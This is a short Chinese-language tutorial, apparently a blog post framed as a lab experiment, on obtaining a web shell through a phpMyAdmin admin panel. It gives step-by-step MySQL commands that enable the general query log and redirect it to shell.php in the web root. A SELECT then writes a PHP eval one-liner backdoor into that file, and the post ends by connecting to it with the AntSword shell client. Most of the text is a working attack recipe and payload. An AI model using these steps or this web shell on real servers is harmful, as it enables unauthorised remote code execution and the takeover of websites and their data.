通過phpmyadmin管理後臺getshell思路有很多種,比如直接寫入一句話、創建表再導出、慢查詢日誌等…
這裏較詳細介紹一下全局日誌getshell思路
phpMyAdmin
phpMyAdmin 是衆多MySQL圖形化管理工具中使用最爲廣泛的一種,是一款使用PHP 開發的基於B/S模式的MySQL客戶端軟件,該工具是基於 Web 跨平臺的管理程序,並且支持簡體中文,用戶可以在官網上下載最新版本的。
GetSHELL前提
- phpMyAdmin利用日誌文件GetSHELL前提賬號必須有可讀可寫權限
- MySQL 5.0版本以上會創建日誌文件,我們通過修改日誌文件的全局變量,就可以GetSHELL
- 滿足上方兩個條件,還需要知道網站的絕對路徑 —> 傳送門:如何爆路徑
這裏簡單用php探針來獲取網站路徑
開始吧
查看general log是否開啓
show variables like '%general%';
打開general_log日誌讀寫功能
SET GLOBAL general_log='on'; SHOW VARIABLES LIKE '%general%';
創建日誌文件
由於之前我們通過php探針得到了網站的絕對路徑,然後我們就可以寫入shell.php到網站的根目錄下:
SET GLOBAL general_log_file='D:\\phpStudy\\PHPTutorial\\WWW\\shell.php';
(注意路徑斜杆雙寫)
寫入一句話到shell.php
SELECT '<?php @eval($_POST[yijuhua]);?>';
這裏說明一點
如果eval連接不上,可採用另外代碼執行函數寫入
連上蟻劍
GOT IT!
******************************************************
小實驗小結,具體測試利用方式需根據具體實踐場景~